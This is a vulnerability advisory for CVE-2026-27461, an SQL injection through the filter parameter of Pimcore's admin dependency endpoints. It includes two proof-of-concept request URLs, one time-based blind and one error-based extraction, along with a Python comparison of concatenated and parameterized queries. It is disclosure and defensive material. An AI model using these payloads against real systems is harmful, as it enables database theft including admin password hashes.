Pimcore: Unsecured Filter Input Allows SQL Injection
CVE-2026-27461
GHSA-vxg3-v4p6-f3fp
Summary
Pimcore's dependency listing endpoints are vulnerable to SQL injection attacks, allowing an attacker with admin access to execute malicious SQL code. This can lead to sensitive data exposure or system disruption. To protect against this, update Pimcore to fix the unsanitized filter input in the Dependency Dao RLIKE clause.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| pimcore | pimcore | <= 11.5.14.1 | – |
| pimcore | pimcore | > 12.0.0, <= 12.3.3 | – |
Original title
Pimcore vulnerable to SQL injection via unsanitized filter value in Dependency Dao RLIKE clause
Original description
The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.
Affected code in models/Dependency/Dao.php:
- getFilterRequiresByPath() lines 90, 95, 100
- getFilterRequiredByPath() lines 148, 153, 158
All 6 locations use direct string concatenation like:
"AND LOWER(CONCAT(o.path, o.key)) RLIKE '".$value."'"
Note that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.
Entry points (pimcore/admin-ui-classic-bundle ElementController.php):
- GET /admin/element/get-requires-dependencies (line 654)
- GET /admin/element/get-required-by-dependencies (line 714)
The controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.
PoC (time-based blind):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR SLEEP(5)#"}]
If vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).
PoC (error-based extraction):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#"}]
Returns the MySQL version string in the error response.
Requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.
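As an added illustration of the bug class described above (not Pimcore's code and not its fix), the vulnerable concatenation is shown beside a parameterized version. It uses Python's sqlite3 with a registered REGEXP function to stand in for MySQL's RLIKE; the table, rows and column names are constructed.

```python
import re
import sqlite3

# Constructed stand-in for MySQL's RLIKE (an alias of REGEXP): sqlite has no
# regex operator built in, so one is registered on the connection below.
def _regexp(pattern, text):
    return text is not None and re.search(pattern, text) is not None

def make_db():
    """In-memory table standing in for the element path/key columns (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("REGEXP", 2, _regexp)
    conn.execute("CREATE TABLE elements (id INTEGER, path TEXT, elem_key TEXT)")
    conn.executemany("INSERT INTO elements VALUES (?, ?, ?)",
                     [(1, "/docs/", "intro"), (2, "/docs/", "secret"), (3, "/media/", "logo")])
    return conn

def vulnerable_filter(conn, value):
    """The advisory's pattern: the JSON-decoded filter value is spliced into the
    RLIKE/REGEXP clause, so a quote in the value terminates the string literal."""
    sql = ("SELECT id FROM elements WHERE LOWER(path || elem_key) REGEXP '"
           + value.lower() + "'")
    return [row[0] for row in conn.execute(sql)]

def hardened_filter(conn, value):
    """Bound parameter: the driver ships the value as data, so it can only ever
    be a regex pattern, never part of the statement."""
    sql = "SELECT id FROM elements WHERE LOWER(path || elem_key) REGEXP ?"
    return [row[0] for row in conn.execute(sql, (value.lower(),))]

def value_breaks_out(conn, value):
    """True when concatenation lets the value alter the statement itself. On
    sqlite that surfaces as a syntax/unknown-function error; on MySQL it is the
    SLEEP() delay or extractvalue() error message the advisory's PoC relies on."""
    try:
        vulnerable_filter(conn, value)
        return False
    except sqlite3.OperationalError:
        return True

# The advisory's own time-based PoC value, reused only to compare the two builders.
POC_VALUE = "x' OR SLEEP(5)#"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_filter(db, "docs"), hardened_filter(db, "docs"))      # [1, 2] [1, 2]
    print(value_breaks_out(db, POC_VALUE), hardened_filter(db, POC_VALUE))  # True []
```

The same regex filter returns identical rows from both builders; only the concatenated one lets the value change the query, which is what the bound parameter prevents.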
NVD CVSS 3.1: 4.9
NVD CVSS 4.0: 6.9
Vulnerability type
CWE-89: SQL Injection
References
- https://github.com/pimcore/pimcore/security/advisories/GHSA-vxg3-v4p6-f3fp (Exploit, Vendor Advisory)
- https://nvd.nist.gov/vuln/detail/CVE-2026-27461
- https://github.com/advisories/GHSA-vxg3-v4p6-f3fp
- https://github.com/pimcore/pimcore/commit/1c3925fbec4895abeb21e5c244a83679c4e4a6... (Patch)
- https://github.com/pimcore/pimcore/pull/18991 (Issue Tracking, Patch)
- https://github.com/pimcore/pimcore/releases/tag/v12.3.3 (Product, Release Notes)
Published: 24 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026